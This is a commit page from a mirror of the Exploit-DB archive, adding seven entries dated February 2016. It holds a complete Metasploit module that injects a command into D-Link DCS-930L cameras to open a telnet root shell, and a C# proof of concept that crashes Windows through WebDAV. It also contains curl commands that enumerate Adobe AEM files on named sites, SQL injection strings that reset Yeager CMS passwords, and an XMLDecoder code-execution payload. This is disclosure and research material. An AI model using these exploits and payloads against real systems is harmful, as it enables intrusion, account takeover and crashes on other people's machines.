bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2016-02-11

Browse source 
7 new exploits
This commit is contained in:
Offensive Security 2016-02-11 05:03:33 +00:00
parent a97b3361e6
commit 3b34885ebf
19 changed files with 3416 additions and 34 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

9
files.csv
View file

@ -17921,7 +17921,7 @@ id,file,description,date,author,platform,type,port
20596,platforms/windows/dos/20596.c,"Microsoft Windows NT 4.0 Networking Mutex DoS Vulnerability",2001-01-24,"Arne Vidstrom",windows,dos,0
20597,platforms/linux/remote/20597.txt,"Majordomo 1.89/1.90 lists Command Execution Vulnerability",1994-06-06,"Razvan Dragomirescu",linux,remote,0
20598,platforms/php/webapps/20598.txt,"Jaow CMS 2.3 - Blind SQLi Vulnerability",2012-08-17,loneferret,php,webapps,0
20599,platforms/unix/remote/20599.sh,"Sendmail 8.6.9 IDENT Remote Root Vulnerability",1994-02-24,CIAC,unix,remote,0
20599,platforms/unix/remote/20599.sh,"Sendmail 8.6.9 IDENT - Remote Root Vulnerability",1994-02-24,CIAC,unix,remote,0
20600,platforms/windows/remote/20600.c,"SmartMax MailMax 1.0 SMTP Buffer Overflow Vulnerability",1999-02-13,_mcp_,windows,remote,0
20601,platforms/multiple/remote/20601.txt,"iweb hyperseek 2000 - Directory Traversal Vulnerability",2001-01-28,"MC GaN",multiple,remote,0
20602,platforms/solaris/remote/20602.c,"Solaris x86 2.4/2.5 nlps_server Buffer Overflow Vulnerability",1998-04-01,"Last Stage of Delirium",solaris,remote,0
@ -35663,6 +35663,13 @@ id,file,description,date,author,platform,type,port
39422,platforms/php/webapps/39422.py,"WordPress WP User Frontend Plugin < 2.3.11 - Unrestricted File Upload",2016-02-08,"Panagiotis Vagenas",php,webapps,80
39423,platforms/php/webapps/39423.txt,"WordPress Booking Calendar Contact Form Plugin <= 1.0.23 - Multiple Vulnerabilities",2016-02-08,"i0akiN SEC-LABORATORY",php,webapps,80
39427,platforms/php/webapps/39427.txt,"Employee Timeclock Software 0.99 - SQL Injection Vulnerabilities",2010-03-10,"Secunia Research",php,webapps,0
39428,platforms/windows/dos/39428.txt,"PotPlayer 1.6.5x - .mp3 Crash PoC",2016-02-09,"Shantanu Khandelwal",windows,dos,0
39429,platforms/windows/dos/39429.txt,"Adobe Photoshop CC & Bridge CC PNG File Parsing Memory Corruption",2016-02-09,"Francis Provencher",windows,dos,0
39430,platforms/windows/dos/39430.txt,"Adobe Photoshop CC & Bridge CC PNG File Parsing Memory Corruption 2",2016-02-09,"Francis Provencher",windows,dos,0
39431,platforms/windows/dos/39431.txt,"Adobe Photoshop CC & Bridge CC IFF File Parsing Memory Corruption",2016-02-09,"Francis Provencher",windows,dos,0
39432,platforms/windows/dos/39432.c,"Microsoft Windows WebDAV - BSoD PoC (MS16-016)",2016-02-10,koczkatamas,windows,dos,0
39433,platforms/linux/local/39433.py,"Deepin Linux 15 - lastore-daemon Privilege Escalation",2016-02-10,"King's Way",linux,local,0
39435,platforms/multiple/webapps/39435.txt,"Apache Sling Framework (Adobe AEM) 2.3.6 - Information Disclosure Vulnerability",2016-02-10,Vulnerability-Lab,multiple,webapps,0
39436,platforms/php/webapps/39436.txt,"Yeager CMS 1.2.1 - Multiple Vulnerabilities",2016-02-10,"SEC Consult",php,webapps,80
39437,platforms/hardware/remote/39437.rb,"D-Link DCS-930L Authenticated Remote Command Execution",2016-02-10,metasploit,hardware,remote,0
39438,platforms/xml/local/39438.txt,"Wieland wieplan 4.1 Document Parsing Java Code Execution Using XMLDecoder",2016-02-10,LiquidWorm,xml,local,0

Can't render this file because it is too large.

158
platforms/hardware/remote/39437.rb Executable file
View file

@ -0,0 +1,158 @@
##
## This module requires Metasploit: http://metasploit.com/download
## Current source: https://github.com/rapid7/metasploit-framework
###
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::Telnet
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'D-Link DCS-930L Authenticated Remote Command Execution',
'Description' => %q{
The D-Link DCS-930L Network Video Camera is vulnerable
to OS Command Injection via the web interface. The vulnerability
exists at /setSystemCommand, which is accessible with credentials.
This vulnerability was present in firmware version 2.01 and fixed
by 2.12.
},
'Author' =>
[
'Nicholas Starke <nick@alephvoid.com>'
],
'License' => MSF_LICENSE,
'DisclosureDate' => 'Dec 20 2015',
'Privileged' => true,
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Payload' =>
{
'Compat' => {
'PayloadType' => 'cmd_interact',
'ConnectionType' => 'find',
},
},
'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
'Targets' =>
[
[ 'Automatic', { } ],
],
'DefaultTarget' => 0
))
register_options(
[
OptString.new('USERNAME', [ true, 'User to login with', 'admin']),
OptString.new('PASSWORD', [ false, 'Password to login with', ''])
], self.class)
register_advanced_options(
[
OptInt.new('TelnetTimeout', [ true, 'The number of seconds to wait for a reply from a Telnet Command', 10]),
OptInt.new('TelnetBannerTimeout', [ true, 'The number of seconds to wait for the initial banner', 25])
], self.class)
end
def telnet_timeout
(datastore['TelnetTimeout'] || 10)
end
def banner_timeout
(datastore['TelnetBannerTimeout'] || 25)
end
def exploit
user = datastore['USERNAME']
pass = datastore['PASSWORD'] || ''
test_login(user, pass)
exploit_telnet
end
def test_login(user, pass)
print_status("#{peer} - Trying to login with #{user} : #{pass}")
res = send_request_cgi({
'uri' => '/',
'method' => 'GET',
'authorization' => basic_auth(user, pass)
})
fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - invalid credentials (response code: #{res.code}") if res.code != 200
print_good("#{peer} - Successful login #{user} : #{pass}")
end
def exploit_telnet
telnet_port = rand(32767) + 32768
print_status("#{peer} - Telnet Port: #{telnet_port}")
cmd = "telnetd -p #{telnet_port} -l/bin/sh"
telnet_request(cmd)
print_status("#{rhost}:#{telnet_port} - Trying to establish telnet connection...")
ctx = { 'Msf' => framework, 'MsfExploit' => self }
sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnet_port, 'Context' => ctx, 'Timeout' => telnet_timeout })
if sock.nil?
fail_with(Failure::Unreachable, "#{rhost}:#{telnet_port} - Backdoor service unreachable")
end
add_socket(sock)
print_status("#{rhost}:#{telnet_port} - Trying to establish a telnet session...")
prompt = negotiate_telnet(sock)
if prompt.nil?
sock.close
fail_with(Failure::Unknown, "#{rhost}:#{telnet_port} - Unable to establish a telnet session")
else
print_good("#{rhost}:#{telnet_port} - Telnet session successfully established")
end
handler(sock)
end
def telnet_request(cmd)
uri = '/setSystemCommand'
begin
res = send_request_cgi({
'uri' => uri,
'method' => 'POST',
'vars_post' => {
'ReplySuccessPage' => 'docmd.htm',
'ReplyErrorPage' => 'docmd.htm',
'SystemCommand' => cmd,
'ConfigSystemCommand' => 'Save'
}
})
return res
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
end
end
def negotiate_telnet(sock)
begin
Timeout.timeout(banner_timeout) do
while(true)
data = sock.get_once(-1, telnet_timeout)
return nil if not data or data.length == 0
if data =~ /BusyBox/
return true
end
end
end
rescue ::Timeout::Error
return nil
end
end
end

2656
platforms/linux/local/39433.py Executable file
View file

File diff suppressed because it is too large Load diff

168
platforms/multiple/webapps/39435.txt Executable file
View file

@ -0,0 +1,168 @@
Document Title:
===============
Apache Sling Framework v2.3.6 (Adobe AEM) [CVE-2016-0956] - Information Disclosure Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1536
Adobe Bulletin: https://helpx.adobe.com/security/products/experience-manager/apsb16-05.html
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-0956
Vulnerability Magazine: http://magazine.vulnerability-db.com/?q=articles/2016/02/10/apache-sling-fw-v236-remote-slingpostservlet-exception-vulnerability
CVE-ID:
=======
CVE-2016-0956
Release Date:
=============
2016-02-10
Vulnerability Laboratory ID (VL-ID):
====================================
1536
Common Vulnerability Scoring System:
====================================
6.4
Product & Service Introduction:
===============================
Apache Sling is a web framework that uses a Java Content Repository, such as Apache Jackrabbit, to store and manage content. Sling applications use either scripts
or Java servlets, selected based on simple name conventions, to process HTTP requests in a RESTful way. The embedded Apache Felix OSGi framework and console provide
a dynamic runtime environment, where code and content bundles can be loaded, unloaded and reconfigured at runtime. As the first web framework dedicated to JSR-170
Java Content Repositories, Sling makes it very simple to implement simple applications, while providing an enterprise-level framework for more complex applications.
(Copy of the Vendor Homepage: http://sling.apache.org/)
Adobe Experience Manager (AEM) provides a complete suite of applications for the Web Experience Management (WEM) of organizations.
(Copy of the Vendor Homepage: https://docs.adobe.com/docs/en/aem/6-1.html )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Core Research Team discovered a remote vulnerability in the official Apache Sling Framwork v2.3.6 software.
Vulnerability Disclosure Timeline:
==================================
2016-02-10: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Apache Software Foundation
Product: Apache Sling - Framework (Adobe AEM) 2.3.6
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
It seems that on some instances of AEM, due to lack of proper security controls and or misconfiguration, it is possible for remote unauthenticated
users to enumerate local system files/folders that arent accessible publicly to unauthenticated users.
This can be achieved by sending a `delete` requests to the SlingPostServlet which in return, responds back with a 500 exception page and the
following exception message: (org.apache.sling.api.resource.PersistenceException - Unable to commit changes to session)
No actual files are deleted with this request however, the HTML response contains a `ChangeLog` field which is where all enumerated folder/file
names are displayed (if existing). For instance, following POC command can be used to reproduce the said behavior.
curl -F``:operation=delete`` -F``:applyTo=/foldername/*`` http://website.com/path/file.html
To reproduce this in real world, I found an adobe website which is currently affected with this behavior. You can use the following CURL command
to reproduce the POC:
curl -F``:operation=delete`` -F``:applyTo=/etc/*`` https://server/content/adobedemolab/welcome-page.html
Note: This curl command should enumerate all files/folders which currently exist in /etc folder
This vulnerability currently affects major websites i.e. almost every instance of Adobe AEM published on the internet. Some references are included below for reference.
Affected Framework(s):
Apache Sling
Affected Product(s)
Adobe AEM (All Versions)
Proof of Concept (PoC):
=======================
The security vulnerability can be exploited by remote attackers without privilege system user account or user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
PoC:
1. curl -F":operation=delete" -F":applyTo=/foldername/*" http://website.com/path/file.html
2. curl -F":operation=delete" -F":applyTo=/etc/*" https://www.adobedemo.com/content/adobedemolab/welcome-page.html
Solution - Fix & Patch:
=======================
The vulnerability is fixed in version Servlets POST 2.3.8. Please update by by automatic request or implement the manual fix.
Adobe: Hot fix 6445 resolves an information disclosure vulnerability affecting Apache Sling Servlets Post 2.3.6 (CVE-2016-0956).
Security Risk:
==============
The security risk of the exception software vulnerability in the apache sling framework is estimated as high. (CVSS 6.4)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Ateeq Khan (ateeq@evolution-sec.com) [www.vulnerability-lab.com] (https://twitter.com/cybercrimenews)
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright © 2016 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com

184
platforms/php/webapps/39436.txt Executable file
View file

@ -0,0 +1,184 @@
SEC Consult Vulnerability Lab Security Advisory < 20160210-0 >
=======================================================================
title: Multiple Vulnerabilities
product: Yeager CMS
vulnerable version: 1.2.1
fixed version: 1.3
CVE number: CVE-2015-7567, CVE-2015-7568, CVE-2015-7569, CVE-2015-7570
,
CVE-2015-7571, CVE-2015-7572
impact: Critical
homepage: http://yeager.cm/en/home/
found: 2015-11-18
by: P. Morimoto (Office Bangkok)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Bangkok - Berlin - Frankfurt/Main - Montreal - Moscow
Singapore - Vienna (HQ) - Vilnius - Zurich
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
Yeager is an open source CMS that aims to become the most cost/time-effective
solution for medium and large web sites and applications.
Business recommendation:
------------------------
Yeager CMS suffers from multiple vulnerabilities due to improper input
validation and unprotected test scripts. By exploiting these vulnerabilities
an attacker could:
1. Change user's passwords including the administrator's account.
2. Gain full access to the Yeager CMS database.
3. Determine internal servers that inaccessible from the Internet.
4. Attack other users of the Yeager CMS with Cross-Site Scripting.
SEC Consult recommends not to use this software until a thorough security
review has been performed by security professionals and all identified
issues have been resolved.
Vulnerability overview/description:
-----------------------------------
1. Unauthenticated Blind SQL Injection (CVE-2015-7567, CVE-2015-7568)
2. Post-authentication Blind SQL Injection (CVE-2015-7569)
3. Unauthenticated Arbitrary File Upload (CVE-2015-7571)
4. Unauthenticated Server-side Request Forgery (CVE-2015-7570)
5. Non-permanent Cross-site Scripting (CVE-2015-7572)
Proof of concept:
-----------------
1. Unauthenticated Blind SQL Injection (CVE-2015-7567, CVE-2015-7568)
http://<host>/yeager/?action=passwordreset&token=<SQL Injection>
http://<host>/yeager/y.php/responder?handler=setNewPassword&us=sess_20000&lh=70
&data=["noevent",{"yg_property":"setNewPassword","params":{"userToken":"<SQL
Injection>"}}]
The vulnerability can also be used for unauthorized reset password of any user.
In order to reset a specific user's password, an attacker will need to provide
a valid email address of the user that he wants to attack.
The email can be retrieved by either social engineering or using the
aforementioned unauthenticated SQL injection vulnerability.
http://<host>/yeager/y.php/responder?handler=recoverLogin&us=sess_20000&lh=70&d
ata=["noevent",{"yg_property":"recoverLogin","params":{"userEmail":"<victim@ema
il.com>","winID":"1"}}]
The above URL just simply creates and sends a reset password token to the
user's email. Next, even if attacker does not know the token,
manipulating SQL commands allows to force to set the new password instantly.
Note that new password MUST be at least 8 characters in length
and must contain both letters and numbers.
http://<host>/yeager/y.php/responder?handler=setNewPassword&us=sess_20000&lh=70
&data=["noevent",{"yg_property":"setNewPassword","params":{"userToken":"'+or+ui
d=(select+id+from+yg_user+where+login='<victim@email.com>')+limit+1--+-","userP
assword":"<new-password>","winID":"1"}}]
2. Post-authentication Blind SQL Injection (CVE-2015-7569)
http://<host>/yeager/y.php/tab_USERLIST
POST Data:
win_no=4&yg_id=2-user&yg_type=user&wid=wid_4&refresh=1&initload=&us=sess_16000&
lh=325&pagedir_page=2&pagedir_perpage=1&pagedir_orderby=<SQL
Injection>&pagedir_orderdir=4&pagedir_from=5&pagedir_limit=6,7&newRole=1
3. Unauthenticated Arbitrary File Upload (CVE-2015-7571)
A publicly known Arbitrary File Upload vulnerability of Plupload was found in
Yeager CMS.
Fortunately, to successfully exploit the vulnerability requires PHP directive
"upload_tmp_dir" set to an existing directory and it must contain the writable
directory "plupload".
By default, the PHP directive "upload_tmp_dir" is an empty value.
As a result, the script will attempt to upload a file to /plupload/ instead
which generally does not exist on the filesystem.
http://<host>/yeager/ui/js/3rd/plupload/examples/upload.php
4. Unauthenticated Server-side Request Forgery (CVE-2015-7570)
http://<host>/yeager/libs/org/adodb_lite/tests/test_adodb_lite.php
http://<host>/yeager/libs/org/adodb_lite/tests/test_datadictionary.php
http://<host>/yeager/libs/org/adodb_lite/tests/test_adodb_lite_sessions.php
The parameter "dbhost" can be used to perform internal port scan using
time delay measurement. An attacker can provide internal IP address
and port number, for example, 10.10.0.1:22. The attacker then compares
time delays from multiple responses in order to determine host
and port availability.
5. Non-permanent Cross-site Scripting (CVE-2015-7572)
A previously published XSS vulnerability of Plupload was found in Yeager CMS.
http://<host>/yeager/ui/js/3rd/plupload/js/plupload.flash.swf?id=\%22%29%29;}ca
tch%28e%29{alert%28/XSS/%29;}//
Vulnerable / tested versions:
-----------------------------
The vulnerabilities have been tested on Yeager CMS 1.2.1
URL: http://yeager.cm/en/download/package/?v=1.2.1.0.0
Vendor contact timeline:
------------------------
2015-12-07: Contacting vendor through office@nexttuesday.de, contact@yeager.cm
2015-12-07: Established secure communication channel
2015-12-07: Sending advisory draft
2015-12-10: Yeager CMS 1.2.2 released for security fixes
2015-12-22: Yeager CMS 1.3 released for security fixes
2016-02-10: Public advisory release
Solution:
---------
The vulnerability has been fixed in Yeager CMS 1.3 and later.
https://github.com/ygcm/yeager/commit/74e0ce518321e659cda54f3f565ca0ce8794dba8#
diff-4200a6e704ae66ada32f35f69796cc71
https://github.com/ygcm/yeager/commit/053a3b98a9a3f4fd94186cbb8994de0a3e8d9307
Workaround:
-----------
No workaround available.
Advisory URL:
-------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Bangkok - Berlin - Frankfurt/Main - Montreal - Moscow
Singapore - Vienna (HQ) - Vilnius - Zurich
About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/Career.htm
Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/About/Contact.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
EOF Pichaya Morimoto / @2015

30
platforms/windows/dos/39428.txt Executable file
View file

@ -0,0 +1,30 @@
# Exploit Title: POTPLAYER 1.6.5x MP3 CRASH POC
# Date: 08-02-2016
# Exploit Author: Shantanu Khandelwal
# Vendor Homepage: https://potplayer.daum.net/
# Software Link: (32-Bit) http://get.daum.net/PotPlayer/v3/PotPlayerSetup.exe
# Software Link: (64-Bit) http://get.daum.net/PotPlayer64/v3/PotPlayerSetup64.exe
# Version: 1.6.5x
# Tested on: Windows XP Sp3,Windows 8,Windows 10
# CVE : unknown at the moment
#============================================================================================
#Description: Read Access Violation on Block Data Mo#ve #Short Description:
ReadAVonBlockMove #Exploitability Classification: PROBABLY_EXPLOITABLE
#============================================================================================
#==================================================
#(8a4.d54): Access violation - code c0000005 (first chance) #First chance
exceptions are reported before any exception handling. #This exception may
be expected and handled. #eax=05d46659 ebx=05bb2998 ecx=00000011
edx=00000000 esi=05c68ffd edi=0012edd4 #eip=01b62e1e esp=0012e9dc
ebp=0363ad80 iopl=0 nv up ei pl nz ac po nc #cs=001b ss=0023 ds=0023
es=0023 fs=003b gs=0000 efl=00010212 #*** ERROR: Symbol file could not be
found. Defaulted to export symbols for C:\Program
Files\DAUM\PotPlayer\PotPlayer.dll -
#===========================================================
POTPLAYER has buffer overflow in png parser of image of MP3 offset 5B .
Crash is because of '\x22' at offset 5B
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39428.zip

128
platforms/windows/dos/39432.c Executable file
View file

@ -0,0 +1,128 @@
/*
Source: https://github.com/koczkatamas/CVE-2016-0051
Proof-of-concept BSoD (Blue Screen of Death) code for CVE-2016-0051 (MS-016).
Full Proof of Concept:
https://github.com/koczkatamas/CVE-2016-0051/archive/master.zip
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39432.zip
*/
using System;
using System.IO;
using System.Linq;
using System.Net;
using System.Net.Sockets;
using System.Runtime.InteropServices;
using System.Text;
using System.Threading;
namespace BSoD
{
class Program
{
static void StartFakeWebDavServer(int port)
{
new Thread(() =>
{
var server = new TcpListener(IPAddress.Loopback, port);
server.Start();
while (true)
{
using (var client = server.AcceptTcpClient())
using (var stream = client.GetStream())
using (var reader = new StreamReader(stream, Encoding.GetEncoding("iso-8859-1")))
using (var writer = new StreamWriter(stream, Encoding.GetEncoding("iso-8859-1")) { AutoFlush = true })
{
Console.WriteLine(" =============== BEGIN REQUEST =============== ");
Func<string> rl = () =>
{
var line = reader.ReadLine();
Console.WriteLine("< " + line);
return line;
};
Action<string> wl = outData =>
{
Console.WriteLine(String.Join("\n", outData.Split('\n').Select(x => "> " + x)));
writer.Write(outData);
};
var header = rl().Split(' ');
while (!string.IsNullOrWhiteSpace(rl())) { }
if (header[0] == "OPTIONS")
wl("HTTP/1.1 200 OK\r\nMS-Author-Via: DAV\r\nDAV: 1,2,1#extend\r\nAllow: OPTIONS,GET,HEAD,PROPFIND\r\n\r\n");
else if (header[0] == "PROPFIND")
{
var body = String.Format(@"
<?xml version=""1.0"" encoding=""UTF-8""?>
<D:multistatus xmlns:D=""DAV:"">
<D:response>
<D:href>{0}</D:href>
<D:propstat>
<D:prop>
<D:creationdate>{1:s}Z</D:creationdate>
<D:getcontentlength>{3}</D:getcontentlength>
<D:getcontenttype>{4}</D:getcontenttype>
<D:getetag>{5}</D:getetag>
<D:getlastmodified>{6:R}</D:getlastmodified>
<D:resourcetype>{8}</D:resourcetype>
<D:supportedlock></D:supportedlock>
<D:ishidden>{7}</D:ishidden>
</D:prop>
<D:status>HTTP/1.1 200 OK</D:status>
</D:propstat>
</D:response>
</D:multistatus>", header[1], DateTime.UtcNow.ToUniversalTime(), "", "0", "", "", DateTime.UtcNow.ToUniversalTime(), 0, header[1].Contains("file") ? "" : "<D:collection></D:collection>").Trim();
wl("HTTP/1.1 207 Multi-Status\r\nMS-Author-Via: DAV\r\nDAV: 1,2,1#extend\r\nContent-Length: " + body.Length + "\r\nContent-Type: text/xml\r\n\r\n" + body);
}
else
wl("HTTP/1.1 500 Internal Server Error\r\n\r\n");
Console.WriteLine(" =============== END REQUEST =============== ");
}
}
}) { IsBackground = true, Name = "WebDAV server thread" }.Start();
}
[StructLayout(LayoutKind.Sequential)]
private class NETRESOURCE
{
public uint dwScope = 0;
public uint dwType = 0;
public uint dwDisplayType = 0;
public uint dwUsage = 0;
public string lpLocalName = null;
public string lpRemoteName = null;
public string lpComment = null;
public string lpProvider = null;
}
[DllImport("mpr.dll")]
private static extern int WNetAddConnection2(NETRESOURCE lpNetResource, string lpPassword, string lpUsername, int dwFlags);
[DllImport("Advapi32.dll", CharSet = CharSet.Auto, SetLastError = true)]
private static extern int DuplicateEncryptionInfoFile(string srcFileName, string dstFileName, uint dwCreationDistribution, uint dwAttributes, IntPtr lpSecurityAttributes);
public static void Main(string[] args)
{
var p = new Random().Next(1024, 65535);
StartFakeWebDavServer(p);
var addConnectionResult = WNetAddConnection2(new NETRESOURCE() { lpRemoteName = @"\\127.0.0.1@" + p + @"\folder\" }, null, null, 0);
Console.WriteLine("WNetAddConnection2 = " + addConnectionResult);
var duplicateEncryptionInfoResult = DuplicateEncryptionInfoFile(@"\\127.0.0.1@" + p + @"\folder\file", "x", 2, 128, IntPtr.Zero);
Console.WriteLine("DuplicateEncryptionInfoFile = " + duplicateEncryptionInfoResult);
Console.WriteLine("BSoD did not happen.");
Console.ReadLine();
}
}
}

51
platforms/xml/local/39438.txt Executable file
View file

@ -0,0 +1,51 @@
Wieland wieplan 4.1 Document Parsing Java Code Execution Using XMLDecoder
Vendor: Wieland Electric GmbH
Product web page: http://www.wieland-electric.com
Affected version: 4.1 (Build 9)
Summary: Your new software for the configuration
of Wieland terminal rails. wieplan enables you to
plan a complete terminal rail in a very simple way
and to then place an order with Wieland. The configured
terminal rail can be stored in DXF format and read
into a CAD tool for further processing. Due to the
intuitive user interface, the configuration of terminal
rails with wieplan is easy.
Desc: wieplan suffers from an arbitrary java code
execution when parsing WIE documents that uses XMLDecoder,
allowing system access to the affected machine. The
software is used to generate custom specification
order saved in .wie XML file that has to be sent
to the vendor offices to be processed.
Tested on: Microsoft Windows 7 Professional SP1 (EN)
Microsoft Windows 7 Ultimate SP1 (EN)
Java/1.8.0_73
Java/1.6.0_62
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5304
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5304.php
25.11.2016
---
<?xml version="1.0" encoding="UTF-8"?>
<java version="1.6.0_02" class="java.beans.XMLDecoder">
<object class="java.lang.Runtime" method="getRuntime">
<void method="exec">
<string>c:\\windows\\system32\\calc.exe</string>
</void>
</object>
</java>